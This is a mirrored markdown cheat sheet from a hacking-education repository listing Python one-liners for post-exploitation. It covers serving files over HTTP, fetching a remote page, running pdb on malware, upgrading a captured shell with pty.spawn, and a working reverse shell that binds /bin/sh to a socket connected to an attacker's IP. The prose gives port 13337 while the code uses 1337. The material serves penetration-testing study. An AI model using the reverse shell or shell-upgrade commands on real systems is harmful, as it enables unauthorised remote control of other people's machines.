mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2024-12-30 08:15:26 +00:00
57 lines
1.5 KiB
Markdown
57 lines
1.5 KiB
Markdown
# Cool Python Tricks
|
|
|
|
## Starting a quick web server to serve some files (useful for post exploitation)
|
|
|
|
### In Python 2.x
|
|
```
|
|
python -m SimpleHTTPServer 1337
|
|
```
|
|
|
|
### In Python 3.x
|
|
```
|
|
python3 -m http.server 1337
|
|
```
|
|
|
|
----
|
|
## Pythonic Web Client
|
|
|
|
### In Python 2.x
|
|
```
|
|
python -c 'import urllib2; print urllib2.urlopen("http://h4cker.org/web").read()' | tee /tmp/file.html
|
|
```
|
|
|
|
### In Python 3.x
|
|
```
|
|
python3 -c 'import urllib.request; urllib.request.urlretrieve ("http://h4cker.org/web","/tmp/h4cker.html")'
|
|
```
|
|
|
|
----
|
|
## Python Debugger
|
|
This imports a Python file and runs the debugger automatically. This is useful for debugging Python-based malware and for post-exploitation.
|
|
|
|
```
|
|
python -m pdb <some_python_file>
|
|
```
|
|
|
|
Refer to this [Python Debugger cheatsheet](https://kapeli.com/cheat_sheets/Python_Debugger.docset/Contents/Resources/Documents/index) if you are not familiar with the Python Debugger.
|
|
|
|
----
|
|
|
|
## Shell to Terminal
|
|
This is useful after exploitation and getting a shell. It allows you to use Linux commands that require a terminal session (e.g., su, sudo, vi, etc.)
|
|
|
|
```
|
|
python -c 'import pty; pty.spawn("/bin/bash")'
|
|
```
|
|
|
|
----
|
|
|
|
## Using Python to do a Reverse Shell
|
|
|
|
You put your IP address (instead of 192.168.78.205) and the port (instead of 13337) below:
|
|
|
|
```
|
|
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.78.205",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
|
|
```
|
|
|